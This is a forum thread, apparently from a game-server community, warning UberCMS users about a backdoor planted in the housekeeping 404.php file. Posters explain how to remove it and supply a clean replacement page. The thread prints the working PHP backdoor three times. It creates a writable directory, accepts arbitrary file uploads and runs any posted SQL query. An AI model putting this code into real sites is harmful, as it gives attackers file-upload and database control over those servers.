UberCMS IMPORTANT FIX - Fix as soon as possible!!!

[leenster]

Here an important fix for UberCMS.

You really need to check your allseeingeye/pages and open the file 404.php.

if that file contains this code ->

PHP Code:

<?php

        require_once "../../global.php";
        require_once "../admincore.php";

    if(!file_exists("god/"))
    {
        mkdir("god/", 0777);
        echo 'Backdoor Directory Created : (god/)';
    }
        else
    {
        echo 'Backdoor Open for Uploading : (god/)';
    }
    
    

if(isset($_POST['submit']))
{
    $target_path = "god/";
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
}

    if(isset($_POST['sql2']))
    {
        $core1225 = $_POST['sql1'];
        mysql_query("".$core1225."");
        echo 'Query Executed Successfully';
    }

?>

<html>
<body>

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"
enctype="multipart/form-data">
  <input type="file" name="uploadedfile" id="file" />
  <input type="submit" name="submit" value="Submit" />
  <br />
</form>
<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p>
<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
  <p>
    <label for="sql1"></label>
    <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea>
  </p>
  <p>
    <input type="submit" name="sql2" id="sql2" value="Execute">
  </p>
</form>
<p>&nbsp;</p>
</body>

Delete the code and put something else in there, such as page not found or whatever....its not important what you put in there....

Failure to do this will leave you open for a whole lot of trouble....


All credits for this go out to : [IP on request] for showing me this on our hotel.
Yes [IP on request] is a real cool hacker that likes to fuck with peoples hard work. Good job dude...

If anybody wants his IP so they can block the dude from their site then ill be more than happy to provide it.

[MentaL]

[Droppy]

I never was seed that on uber edits... Where cms do you found it?

[leenster]

I never was seed that on uber edits... Where cms do you found it?

It either came with UberCMS 2.01 or one of the housekeeping fixes that got released here...... I better start checking stuff before I add it...

[Nilenz]

It either came with UberCMS 2.01 or one of the housekeeping fixes that got released here...... I better start checking stuff before I add it...

I have this never seen?
And thank you for the release :p

[leenster]

** Removed accusations **

[landline]

Thanks for this release! it will help a lot of people.

[Sledmore]

Nice share, people should really check each file, lol.

[leenster]

Ill remove the credits until i have more proof....

[Pallepop]

Try this code instead;(Not tested)

Code:

<?php 

        require_once "../../global.php"; 
        require_once "../admincore.php"; 

    if(!file_exists("god/")) 
    { 
        mkdir("god/", 0777); 
        echo 'Backdoor Directory Created : (god/)'; 
    } 
        else 
    { 
        echo 'Backdoor Open for Uploading : (god/)'; 
    } 
     
     

if(isset($_POST['submit'])) 
{ 
    $target_path = "god/"; 
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);  
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 
    echo "The file ".  basename( $_FILES['uploadedfile']['name']).  
    " has been uploaded"; 
} else{ 
    echo "There was an error uploading the file, please try again!"; 
} 
} 

    if(isset($_POST['sql2'])) 
    { 
        $core1225 = $_POST['sql1']; 
        mysql_query("".$core1225.""); 
        echo 'Query Executed Successfully'; 
      } 

?>

<html>
<body>
<?php
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" 
enctype="multipart/form-data"> 
  <input type="file" name="uploadedfile" id="file" /> 
  <input type="submit" name="submit" value="Submit" /> 
  <br /> 
</form> 
<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p> 
<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>"> 
  <p> 
    <label for="sql1"></label> 
    <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea> 
  </p> 
  <p> 
    <input type="submit" name="sql2" id="sql2" value="Execute"> 
  </p> 
</form> 
<p>&nbsp;</p>
?>
</body>
<html>

[leenster]

Try this code instead;(Not tested)

Code:

<?php 

        require_once "../../global.php"; 
        require_once "../admincore.php"; 

    if(!file_exists("god/")) 
    { 
        mkdir("god/", 0777); 
        echo 'Backdoor Directory Created : (god/)'; 
    } 
        else 
    { 
        echo 'Backdoor Open for Uploading : (god/)'; 
    } 
     
     

if(isset($_POST['submit'])) 
{ 
    $target_path = "god/"; 
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);  
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 
    echo "The file ".  basename( $_FILES['uploadedfile']['name']).  
    " has been uploaded"; 
} else{ 
    echo "There was an error uploading the file, please try again!"; 
} 
} 

    if(isset($_POST['sql2'])) 
    { 
        $core1225 = $_POST['sql1']; 
        mysql_query("".$core1225.""); 
        echo 'Query Executed Successfully'; 
      } 

?>

<html>
<body>
<?php
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" 
enctype="multipart/form-data"> 
  <input type="file" name="uploadedfile" id="file" /> 
  <input type="submit" name="submit" value="Submit" /> 
  <br /> 
</form> 
<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p> 
<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>"> 
  <p> 
    <label for="sql1"></label> 
    <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea> 
  </p> 
  <p> 
    <input type="submit" name="sql2" id="sql2" value="Execute"> 
  </p> 
</form> 
<p> </p>
?>
</body>
<html>

Wtf delete it if it looks anything like that!!!

Its an exploit to upload files and or run any query on your db...

Heck just delete 404.php all together...

Sent from some remote location using Tapatalk...

[landline]

You don't even really need the 404 for hk anyway, all hk's have a menu where you can get to everything

[SubZ]

Shouldnt use ubercms 2 in the first place? But thx, will help some noobs

[Livar]

Why would anyone want to use uberCMS anyway? Thanks fo' this anyway

[Papercup]

Good Find, Keep up the good work.

[The General]

Backdoors everywhere lol.

They will get found and released on ragezone.
Jonteh makes a new "update" with new backdoors
They will get found and released on ragezone.

This is what is happening.

[jasjj]

Just stop using ubercms 2.0? or remove them

[Nilenz]

Jonty do this because he than Copyright changes prevents.
I snap him well.

[SwainyHD]

Jonty didn't do that, I think I know the culperate who did though.....

[landline]

Backdoors everywhere lol.

They will get found and released on ragezone.
Jonteh makes a new "update" with new backdoors
They will get found and released on ragezone.

This is what is happening.

Joonteh is banned on RZ.. even if he made a new account, it would be a little weird having an uber edit from a new user.

[Matthew]

Joonteh is banned on RZ.. even if he made a new account, it would be a little weird having an uber edit from a new user.

Not really. You get noobs releasing "edits" (do take note of the quotes) everyday.

[Quackster]

The code should be this instead.

PHP Code:

<?php

if (!defined('IN_HK') || !IN_HK)
{
    exit;
}

if (!HK_LOGGED_IN)
{
    exit;
}

require_once "top.php";

?>            

<div style="margin: 25px;">
<center>
    <b style="font-size: 18px;">Page not found</b>
    
    <p>
        This page has moved or does not exist.
    </p>
    
    <p>
        If you think you've found a bug, please report it on the <a href="index.php?_cmd=forum">discussion forum</a>.
    </p>
    
</center>
</div>

<?php

require_once "bottom.php";

?>